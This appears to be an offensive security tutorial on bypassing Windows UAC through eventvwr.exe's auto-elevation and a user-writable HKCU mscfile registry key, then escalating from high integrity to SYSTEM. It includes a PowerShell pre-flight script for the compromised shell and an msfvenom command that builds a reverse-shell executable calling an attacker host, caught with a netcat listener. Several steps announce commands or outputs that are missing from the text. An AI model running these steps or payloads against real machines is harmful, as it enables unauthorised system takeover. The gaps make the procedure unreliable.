UAC bypass using eventvwr.exe
In a scenario where you have obtained a shell as a user who is a member of the local Administrators group but UAC is enabled, the shell runs with a filtered medium-integrity token: anything that needs administrative rights has to be elevated, and on the default UAC level that means a consent prompt on the interactive desktop, which you cannot answer from a remote shell. To get around this, two steps are needed,
Elevate command shell from medium to high integrity
Elevate from high integrity to system
When you enumerate the privileges of that shell (whoami /priv) you will find only a handful enabled; the filtered token has most of the interesting ones (SeDebugPrivilege, SeImpersonatePrivilege, SeBackupPrivilege and so on) stripped out.
You can check whether UAC is enabled by executing the following command,
If the output shows,
then UAC is enabled, else you can expect the following output,
We are going to use a C variant of the exploit to elevate the privileges. The C code can be found here. The bypass works because eventvwr.exe is a Microsoft-signed binary whose manifest requests auto-elevation, so it is started at high integrity without a prompt; on affected builds it then resolves the handler for .msc files through HKCU\Software\Classes\mscfile\shell\open\command, a key the medium-integrity user can write, so whatever command is placed there runs at high integrity. Microsoft fixed this lookup on later Windows 10 releases, so confirm the target build is affected before relying on it.
You can check whether eventvwr.exe has autoElevate enabled through the following commands,
The path to the executable should be "C:\Windows\System32\eventvwr.exe"
This should display that the flag <autoElevate>true</autoElevate> is set in the embedded manifest.
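The pre-flight checks above (integrity level, UAC state, the autoElevate flag, and the HKCU key the bypass relies on), collected into one script that can be pasted into the medium-integrity shell. This is an added example and not part of the original page or the exploit's C source; it assumes PowerShell 5.1 on an English-locale target, the UAC registry values as documented by Microsoft, and that eventvwr.exe's manifest is stored as plain ASCII in the binary (which is how RT_MANIFEST resources are embedded):

```powershell
# Added example (not from the original page): pre-flight checks for the
# eventvwr.exe UAC bypass, run from the medium-integrity shell.
# Assumptions: PowerShell 5.1, English-locale output from whoami, and the
# standard UAC policy key under HKLM.

function Get-IntegrityLevel {
    # whoami /groups lists the token's mandatory label, e.g.
    # "Mandatory Label\Medium Mandatory Level" (English locale assumed)
    $line = (whoami /groups) | Where-Object { $_ -match 'Mandatory Label' }
    if ($line -match 'Mandatory Label\\(\S+) Mandatory Level') { return $Matches[1] }
    return 'Unknown'
}

function Get-UacSettings {
    # Documented UAC policy values; EnableLUA=0 means UAC is off entirely.
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $p = Get-ItemProperty -Path $key
    [pscustomobject]@{
        EnableLUA                  = $p.EnableLUA
        ConsentPromptBehaviorAdmin = $p.ConsentPromptBehaviorAdmin
        PromptOnSecureDesktop      = $p.PromptOnSecureDesktop
    }
}

function Test-AutoElevate {
    param([string]$Path = "$env:SystemRoot\System32\eventvwr.exe")
    # The application manifest is embedded as an RT_MANIFEST resource in plain
    # ASCII, so a raw byte search is enough to read the autoElevate flag.
    $bytes = [System.IO.File]::ReadAllBytes($Path)
    $text  = [System.Text.Encoding]::ASCII.GetString($bytes)
    return ($text -match '<autoElevate>\s*true\s*</autoElevate>')
}

function Get-MscfileHandler {
    # The key eventvwr.exe consults for the .msc handler on affected builds.
    # It lives under HKCU, so the medium-integrity user can create it; if it
    # already exists someone (or an earlier run) has been here before.
    $key = 'HKCU:\Software\Classes\mscfile\shell\open\command'
    if (Test-Path $key) { return (Get-ItemProperty -Path $key).'(default)' }
    return $null
}

# --- report ---
"Integrity level : $(Get-IntegrityLevel)"
$uac = Get-UacSettings
"EnableLUA       : $($uac.EnableLUA)   (1 = UAC on)"
"ConsentPrompt   : $($uac.ConsentPromptBehaviorAdmin)   (5 = default; 2 = 'Always notify', autoElevate does not apply)"
"SecureDesktop   : $($uac.PromptOnSecureDesktop)"
"autoElevate     : $(Test-AutoElevate)"
$existing = Get-MscfileHandler
if ($existing) { "HKCU mscfile key: already set to '$existing'" }
else           { "HKCU mscfile key: absent (clean)" }
"Enabled privileges before the bypass:"
whoami /priv
```

Two values decide whether this route is worth taking: EnableLUA must be 1 (otherwise there is nothing to bypass), and ConsentPromptBehaviorAdmin must not be 2, because at the "Always notify" level Windows prompts even for auto-elevating Microsoft binaries and the trick fails. Once the bypass has been used, delete the HKCU mscfile key again; leaving it behind is both a loud artifact for defenders and a way for anyone else on the box to inherit your high-integrity launch.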
In the above C code change the following and compile,
Compile in Kali using,
Set up a netcat listener on the port that you have used within reverse_shell.exe.
After transferring the file to the target and executing it, you should get a reverse shell on the listening port. Listing the privileges again (whoami /priv) should now display many more than before, which confirms that the shell is running at high integrity.
From this high-integrity shell we now need to initiate another reverse shell, this time as SYSTEM, using the following command,
The obtained shell should be a SYSTEM shell (whoami returns nt authority\system).
You can generate the reverse_shell.exe executable used in both steps with the following msfvenom command (adjust LHOST and LPORT to your listener),
msfvenom -a x64 --platform Windows -p windows/x64/shell_reverse_tcp LHOST=192.168.119.188 LPORT=443 -f exe -o reverse_shell.exe